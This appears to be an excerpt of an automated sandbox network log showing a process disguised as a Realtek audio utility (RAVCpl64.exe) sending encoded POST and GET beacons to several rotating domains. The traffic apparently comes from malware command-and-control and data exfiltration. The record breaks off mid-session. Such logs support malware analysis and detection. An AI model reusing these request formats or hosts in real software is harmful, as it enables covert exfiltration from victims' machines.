                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yveCLs2WyVfzFDf1GOwUFtqq/OwBkJNvB35PkBrb6MkhKrTK5N0OZqAue9eGyMW9JZ8Y5rM5O/xMgvJ0N0t3dw==
                                                                                        set-cookie: parking_session=721997bd-5b5d-43ec-a523-0bab8437e4c9; expires=Thu, 12 Dec 2024 21:10:46 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yveCLs2WyVfzFDf1GOwUFtqq/OwBkJNvB35PkBrb6MkhKrTK5N0OZqAue9eGyMW9JZ8Y5rM5O/xMgvJ0N0t3dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:55:46.663629055 CET850INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzIxOTk3YmQtNWI1ZC00M2VjLWE1MjMtMGJhYjg0MzdlNGM5IiwicGFnZV90aW1lIjoxNzM0MDM2OTQ2LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuc29iLnJpcC90cDhrLz9


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        29 | 192.168.11.20 | 49744 | 76.223.54.146 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:55:51.965357065 CET | 659 | OUT | POST /b9be/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.blockconnect.tech
                                                                                        Origin: http://www.blockconnect.tech
                                                                                        Referer: http://www.blockconnect.tech/b9be/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=wMF10acoaebOgE5BnIhSLlBpV98fD5o7OWUq3BFaEDiGu6dp8ijs1Upud5P67gP9tCHEiVhHPWM2nSBahJfyM6eYL5WGFSI9VkxAqxpbH3HhJxO1jiaO5OyOjJ7FKrIalqcpTGhOlzIgsZwISkJu23pmw1fUeVSySFQ+JQduzWcyuOoSaJUZFCgshqDlAsU3YQ==
                                                                                        Dec 12, 2024 21:55:52.096324921 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        30 | 192.168.11.20 | 49745 | 76.223.54.146 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:55:54.626027107 CET | 679 | OUT | POST /b9be/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.blockconnect.tech
                                                                                        Origin: http://www.blockconnect.tech
                                                                                        Referer: http://www.blockconnect.tech/b9be/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=wMF10acoaebOmkJBrPVSMFBqW98fMZo/OWIq3ABKExGGpbtp9jjsgUpuXZP/mwOztCK5iVdHPWY2nSRah4f1PKeaeJWELyI9VkxAqwNxHzjhJB+1iBCR0uyNiJ7FALIelqdOTH9ol1EgscMIT1JthHpg/VeeVFv7aF03Gnhg1HAlvYlIH7g9GR8ela6NCuVsFchD8dJleL9zFoWMFuwWbOA=
                                                                                        Dec 12, 2024 21:55:54.756758928 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        31 | 192.168.11.20 | 49746 | 76.223.54.146 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:56:12.326941013 CET | 1289 | OUT | POST /b9be/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.blockconnect.tech
                                                                                        Origin: http://www.blockconnect.tech
                                                                                        Referer: http://www.blockconnect.tech/b9be/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:56:12.458286047 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        32 | 192.168.11.20 | 49747 | 76.223.54.146 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:56:14.982254982 CET | 387 | OUT | GET /b9be/?Sb=9OtV3uwQRtibrVA4hLtUEhtAbrgSLeETN2Bs+yR1Dw7urrZ54AC3m2EUc6XgmT690RzFqG8rClBthhFIppTUTpiMaaqCJj4lBnElnRAnP0SDGQ+vlziE68E=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.blockconnect.tech
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:56:15.116914034 CET | 378 | IN | HTTP/1.1 200 OK
                                                                                        content-type: text/html
                                                                                        date: Thu, 12 Dec 2024 20:56:15 GMT
                                                                                        content-length: 257
                                                                                        connection: close
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Sb=9OtV3uwQRtibrVA4hLtUEhtAbrgSLeETN2Bs+yR1Dw7urrZ54AC3m2EUc6XgmT690RzFqG8rClBthhFIppTUTpiMaaqCJj4lBnElnRAnP0SDGQ+vlziE68E=&Hsa=KVXAK1dJ22EyzD"}</script></head></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        33 | 192.168.11.20 | 49748 | 52.223.13.41 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:56:20.474040985 CET | 638 | OUT | POST /1w6c/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.guilda.pro
                                                                                        Origin: http://www.guilda.pro
                                                                                        Referer: http://www.guilda.pro/1w6c/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=3gPU3w05oFmQkYfet7G8Bmwov5X91WZtxgd2mwrXivgXwfAez9AQTOQHG6ANnKiyj8HBq2sgL3n6MX+bphZsKtY1rw0RmzYgYO3B0n8gP1s+3SatVz0K5uY2h9SFoiTKXJ59ZBYI/fRiaMRu+C56CDJ+8uNFlGj7KXPJv2/PeGdAlIkhcBmPrVFLcQuMKrJV6g==
                                                                                        Dec 12, 2024 21:56:20.604863882 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        34 | 192.168.11.20 | 49749 | 52.223.13.41 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:56:23.117257118 CET | 658 | OUT | POST /1w6c/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.guilda.pro
                                                                                        Origin: http://www.guilda.pro
                                                                                        Referer: http://www.guilda.pro/1w6c/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=3gPU3w05oFmQl4PeoYu8HGwpq5X9jmYFxgB2m1OcicEXw68ew40QQOQHOaAEqqilj8LzqywgL3j6MWObqQZvL9YNzA0TizYgYO3B0noKP10+2hStVWIJwOY1i9SFsiTOXJ5bZDs2/ZViaNhu+T5lIDJ4zOM1sD6wDG29iRnUTGl0kep7BzSroGZ5YgXkIpIOnne0yviqjiy63QqrGg64j5A=
                                                                                        Dec 12, 2024 21:56:23.248136044 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        35 | 192.168.11.20 | 49750 | 52.223.13.41 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:56:25.759191036 CET | 2578 | OUT | POST /1w6c/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.guilda.pro
                                                                                        Origin: http://www.guilda.pro
                                                                                        Referer: http://www.guilda.pro/1w6c/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:56:25.889538050 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        36 | 192.168.11.20 | 49751 | 52.223.13.41 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:56:28.397562981 CET | 380 | OUT | GET /1w6c/?Hsa=KVXAK1dJ22EyzD&Sb=6in00ENShVrGnKChmbChIXNbgO3p2TpRxDoWlxyauu1a14sApsVuao58PKEy9ZfMqdeygU8jDVXPCne7mQVbEOArj0ZOnhNCf8Kk2mpmREY64SemV0EG5N4= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.guilda.pro
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:56:28.529567003 CET | 378 | IN | HTTP/1.1 200 OK
                                                                                        content-type: text/html
                                                                                        date: Thu, 12 Dec 2024 20:56:28 GMT
                                                                                        content-length: 257
                                                                                        connection: close
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Hsa=KVXAK1dJ22EyzD&Sb=6in00ENShVrGnKChmbChIXNbgO3p2TpRxDoWlxyauu1a14sApsVuao58PKEy9ZfMqdeygU8jDVXPCne7mQVbEOArj0ZOnhNCf8Kk2mpmREY64SemV0EG5N4="}</script></head></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        37 | 192.168.11.20 | 49752 | 198.2.236.225 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:56:34.063170910 CET | 650 | OUT | POST /f7zl/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.shandongyb.top
                                                                                        Origin: http://www.shandongyb.top
                                                                                        Referer: http://www.shandongyb.top/f7zl/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=Er9jYep5ziLaiZ90qC8OWgBC5l+Dk51r/X+317NDg62bBPQk6DtAqMxbJVkk20VooDh9Tyk/RMoctbjcshz0srLA4HmY7ZjEY3EiyyNCHi6yf8AtDsS3EajtLuBUN5F3U+zjy4Rreo4LznXj0py5IQ7znFvnTQ+gWFIxwU8T4mloXpWfQW3i2yaz1NTMPdkumA==
                                                                                        Dec 12, 2024 21:56:34.234461069 CET | 146 | IN | HTTP/1.1 404 Not Found
                                                                                        Transfer-Encoding: chunked
                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                        Date: Thu, 12 Dec 2024 20:56:33 GMT
                                                                                        Connection: close
                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        38 | 192.168.11.20 | 49753 | 198.2.236.225 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:56:36.767438889 CET | 670 | OUT | POST /f7zl/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.shandongyb.top
                                                                                        Origin: http://www.shandongyb.top
                                                                                        Referer: http://www.shandongyb.top/f7zl/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=Er9jYep5ziLaj950thEOXABB1F+DvZ1v/Xy31+tTgoibAqskoStArMxbH1lgy0VdoDtPT3c/RMUctbTcvSb7jbLOxnmamJjEY3Eiyyp7HiiyftwtDNSwM6juMuBUbJFzU+y0y59BeqwLzlfj34y4Tg71pluFVy7UV14/2GA11H99W/bFNkDG1hGBx9qkNfl17OfOhxWk05GvgGG94UnZFXI=
                                                                                        Dec 12, 2024 21:56:36.936269999 CET | 146 | IN | HTTP/1.1 404 Not Found
                                                                                        Transfer-Encoding: chunked
                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                        Date: Thu, 12 Dec 2024 20:56:36 GMT
                                                                                        Connection: close
                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        39 | 192.168.11.20 | 49754 | 198.2.236.225 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:56:39.468727112 CET | 1289 | OUT | POST /f7zl/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.shandongyb.top
                                                                                        Origin: http://www.shandongyb.top
                                                                                        Referer: http://www.shandongyb.top/f7zl/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:56:39.468775034 CET | 1289 | OUT
                                                                                        Data Ascii: 3+RrTuZch7vcXqAZVXy7dZHJdc2z+/2ip+oPMxO5i0LUxWwqaKmsAr9vIAb+eoJtb30k0VSLKt0JfGNhQeIZi6lDppa8SyqvXNxwAaHecVZfv3AkaAgVAPtPrQArIV3muUmBWYbEVAWHDm9aEWaNPLrLlDURv8VFhgw1uX9sv4wkhgwy2uK75ZrGQP1+CFytcq5bKjsrMPiVCObzN7QYZBxaNARb8kDJU/rL7024ejqLnIdKNdC
                                                                                        Dec 12, 2024 21:56:39.468826056 CET | 5241 | OUT
                                                                                        Data Ascii: O1iKwMK4GtP4ecfde9VealpEdA1WOJvY5rkXmNfEuDhsiTb8GfmwKX41Gc0zsefvrJ49zHGryUPKPIEAysy7xniPhIRMAjTrbEb64WD7N3m48v/qGz95Pkj4PHdKdqfzYVtpebAgjC8T19xthK6A3+B+KrGWU/0r+xD/IdyyjeA4ZTiwE59pkruA98dgYQxz2gvGwdAipPdI3qnG8Xvt1lgMs3fEtb7h+MobIZpO+q08lUpJeuI
                                                                                        Dec 12, 2024 21:56:39.637723923 CET | 146 | IN | HTTP/1.1 404 Not Found
                                                                                        Transfer-Encoding: chunked
                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                        Date: Thu, 12 Dec 2024 20:56:39 GMT
                                                                                        Connection: close
                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        40 | 192.168.11.20 | 49755 | 198.2.236.225 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:56:42.167582035 CET | 384 | OUT | GET /f7zl/?Sb=JpVDbrUZlDTgo68GijwbXUpM20WTl/lO5ke29OZx5ZiPNIs3iQFHoOZPOWsCnUoFoD4OWghDdoQd24qIggPhoo7R/zvFzJ3VTGAfqCgLISGEH/s3DM2hN/E=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.shandongyb.top
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:56:42.337433100 CET | 146 | IN | HTTP/1.1 404 Not Found
                                                                                        Transfer-Encoding: chunked
                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                        Date: Thu, 12 Dec 2024 20:56:41 GMT
                                                                                        Connection: close
                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        41 | 192.168.11.20 | 49756 | 142.171.82.112 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:56:47.676862955 CET | 650 | OUT | POST /ivn4/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.augier2619.top
                                                                                        Origin: http://www.augier2619.top
                                                                                        Referer: http://www.augier2619.top/ivn4/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=QOow9rTb1m+B306lcUz0fhU+yRnRMc4bYqYGcLU3cPuIq3icLlwaYfAaVfSEaQP8uwpF17WskRhVW+ZhagZiKHrnvenTrSyH89ARMlxX/cHgneJq4s2QF8k8fPYhiYTpuwNaMQ19MB+yK8DAmmFHj02MZ12Sf1gjDaVaAvIUq+Jc/8utdjYjWt8SICVX7MzuIQ==


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        42 | 192.168.11.20 | 49757 | 142.171.82.112 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:56:50.366075993 CET | 670 | OUT | POST /ivn4/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.augier2619.top
                                                                                        Origin: http://www.augier2619.top
                                                                                        Referer: http://www.augier2619.top/ivn4/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=QOow9rTb1m+B0RqlPHb0ZBU9+xnRG84fYqUGcKhqd8KIrWScKmoaRPAae/SBXwP1uwlN15SskR1VW7dhZRZjF3rl6OnRkyyH89ARMl15/cPgnvZq5N2XbMkzYPYhzoTtuwNkMVs1MEyyK9zAn09Ap03md12GZWFHEaxFB/YOyeBnzKj3ARsHV+ggMys/5Oy1VUPJgeMMEAyFvJNAyhgZz+A=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        43 | 192.168.11.20 | 49758 | 142.171.82.112 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:56:53.049279928 CET | 1289 | OUT | POST /ivn4/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.augier2619.top
                                                                                        Origin: http://www.augier2619.top
                                                                                        Referer: http://www.augier2619.top/ivn4/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=QOow9rTb1m+B0RqlPHb0ZBU9+xnRG84fYqUGcKhqd8CIrkacLGUaDfAaTfSAXwOluw9J15OSkX5VWdhhSDxjSHrl4OnSrSyo89wVMlF5/cPgntxq+c2XZMk8fPYliYTFuwEfMUYlMwOyKdjAgHFAz02ARV3BZW5YEa9zB/s0yfJnls2qSF4KC+kbIA0pxsyHfnbDoYAFFwzQn/MMpSsStJqsMCXsu5gqn7E3y85otBdkvfCczQPD7UucN3V14MNSvpdvCUNoAd7kR+etyW/rr7Q7MyZ9Y1HCfAVNujyH0jg253XSL5m7xPj7autV16sAfbx7FOUN3c+dNfOgPGY2iu50AOVbF6zM4k7T1xSFnFRRPragR0lXvfyiJqI/diE5g+lxP+QpOpaJcNPY9fbuGSgYeeDJyyLXMc5Jhp27q4L2Z6yK4HvP8Pe3TJDTFrgey1ZD8Og74F0DUuBSzPfpnYduLKa9K+SWQAR9H1lAnqDmJNxHSVcGXtSdRR80D+uGi35E2uu0cDfFKDHTmHGC+g6fw7tpoqFZ9hBEnYotLffx0dAtnb9WiN8V3coA64X/8gliYJimYlgf/jn7uA2rpOxUhRELflIW/+gAXQLAtstbWy8O9kYkW3zzXODPwix8pg/z1lClkgxlvp8v+ASZt/CHwgA8klL6EhvqQJ4wzkgPHjev59JXRsdnBqtT4+x4ComboCIpviOkEeaxP0uDTUWTSFKU4hgweqyMwhFqYQulxhNtOJhDq3Ygj7PiJRMH/vQi+ciF45R+dovSb4yzbMV6Hg/rzjHmkzeu1eIx7VFWWgyKBaTx+80Rfn6SQifztY
                                                                                        Dec 12, 2024 21:56:53.049329042 CET | 5156 | OUT
                                                                                        Data Ascii: gvdr+EUAOLkjcqVNIpWcTBDLCg/6LIrIA4TjMmYGAVEV8KsfAd98QbsaaLqJciCZJSMMJzVLcgoFcMl6JwKgntp1Es+jZ+JtFGWP005p60z8bPUw9Q4gkSH+5B1Ncb6nezKnqn5p6gKJKFBkcO0OVzSWY6hS10SljCBEf+xqFBKhxvCdBbzkaV0+PkwXB7Vf2lC7eMGwFXRWFyC1oHRzXzNpSbBPaYKrykrs+lHYh2QYKM/zap/
                                                                                        Dec 12, 2024 21:56:53.049376965 CET | 1374 | OUT
                                                                                        Data Ascii: rHwc9Qq863zo5x4X/kEs2REUV610Uo0a91MerRTVEWPsqR98qEeIXt7G1L1vxoU/Awr/k/xJLtSNQkqk78b7vW2/KyqDE7FppGNMmnDDVeK4crQ0HLqchiBtjWkIWzjTMkGna3BZxnnLuifkWE7OnapnN0RNqPxAY915t5Yyq0ff8/HvGrbxmGFoRC0iP8ueYxNfQfnUamcTot6c26p3Uy3e0XWbJjAbAXh8vnjv2HeU2SLo4Rq


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        44 | 192.168.11.20 | 49759 | 142.171.82.112 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:56:55.738823891 CET | 384 | OUT | GET /ivn4/?Hsa=KVXAK1dJ22EyzD&Sb=dMAQ+cXbzFKaj3/VQV3ARRE/+V/pDaMde5ltK60scu7oomHWLUNrXeVoeNmDAD713TgV67ncuzdzcshVShA4O3nj+t7UnCG15p0qDWw9jP76vMR/2Muxc8U= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.augier2619.top
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        45 | 192.168.11.20 | 49760 | 15.197.148.33 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:57:01.200845957 CET | 674 | OUT | POST /kr0d/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.outandaboutatlanta.net
                                                                                        Origin: http://www.outandaboutatlanta.net
                                                                                        Referer: http://www.outandaboutatlanta.net/kr0d/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
